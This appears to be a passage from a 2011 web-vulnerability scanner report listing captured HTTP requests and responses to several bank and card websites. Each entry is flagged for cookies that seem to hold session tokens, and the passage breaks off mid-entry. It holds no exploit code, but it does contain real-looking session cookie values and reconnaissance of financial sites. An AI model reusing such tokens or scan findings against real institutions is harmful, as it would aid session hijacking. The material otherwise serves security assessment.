HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 17909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /citibankV2/prxInput.aspx HTTP/1.1 Host: locations.citibank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 143 Content-Type: text/html; charset=utf-8 Location: /citibankV2/Index.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=1lqcuirll4aur455pgm1mg45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 02 Feb 2011 22:11:31 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fcitibankV2%2fIndex.aspx">here</a>.</h2> </body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/military/login.jsp HTTP/1.1 Host: militarybankonline.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mfnfopwd/ HTTP/1.1 Host: myaccountsaws.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:06 GMT Server: IBM_HTTP_Server Content-Length: 12458 Set-Cookie: JSESSIONID=0001y-jIhHTKM6s3Y1_oSLOT9oS:15cea9hua; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US
<?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: online.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 18175 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/ Date: Wed, 02 Feb 2011 22:02:31 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rate36s.asp? HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQATDDAR=NGIHILFABKDPKDCHAENGBKCJ; path=/ Date: Wed, 02 Feb 2011 22:02:33 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shop/ECC/Account/OlApp.aspx HTTP/1.1 Host: shop.aafes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Set-Cookie: AAFES=R1966950070; path=/ Connection: close Date: Thu, 03 Feb 2011 01:04:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Location: https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx Set-Cookie: ASP.NET_SessionId=2n4tod55edqnia45xomyrlzq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 216
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx">here</a>.</h2>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetIDScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetPasscodeScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/signon.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/ Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: support01.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:00 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3 X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 1713 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signaturesouthwest/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/FUSA_Amazon/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loginout/login.asp HTTP/1.1 Host: www.1sttools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:54:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 11382 Content-Type: text/html Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/ Cache-control: private
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Control.do?body=where_passcode_popup HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:48 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000hLN0EFuVu6_KB0QSkbXPq6x:12qb4k4pc; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: ngen_throttle=497; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: hp_beta=B; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:48 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-cards/cardoverview.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:02 GMT Content-length: 0 Content-type: text/html Set-Cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.bankofamerica.com; secure Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards Content-language: en-US Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:53 GMT Content-length: 0 Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/deposits/index.action Content-language: en-US Set-cookie: JSESSIONID=0000sNWjiXby7ONUwh45995dJgv:12qb4k93q; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:52 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/WidgetAction.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:36:37 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Content-Length: 11 Set-Cookie: JSESSIONID=00003PfGoFif26Fdykwp9gAzvj_:15bvh4s8c; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Via: On-Demand Router/1.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/overview.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hub/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:54 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/ Content-language: en-US Set-cookie: JSESSIONID=00008fBXnMpsDuQjSc8kH5YogBG:12qb4k2ev; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myexpression_banking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:25 GMT Content-length: 0 Content-type: text/html Location: https://www5.bankofamerica.com/planning/investments.action Content-language: en-US Set-cookie: JSESSIONID=0000MZoA15Z0qVQ4mcJR1wynojo:12qtmh33l; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/investments.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:32 GMT Content-type: text/html Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache, post-check=0, pre-check=0 Content-language: en-US Set-cookie: JSESSIONID=0000-_A2xQfu_W2uW6lF2fly4Fp:12qb4k2ev; Path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:07 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000mMBXhgo6t8S8rSEKqaClP3F:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:06 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:05 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000lQoVpN6o_Syjb5ohyReSXTa:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:04 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
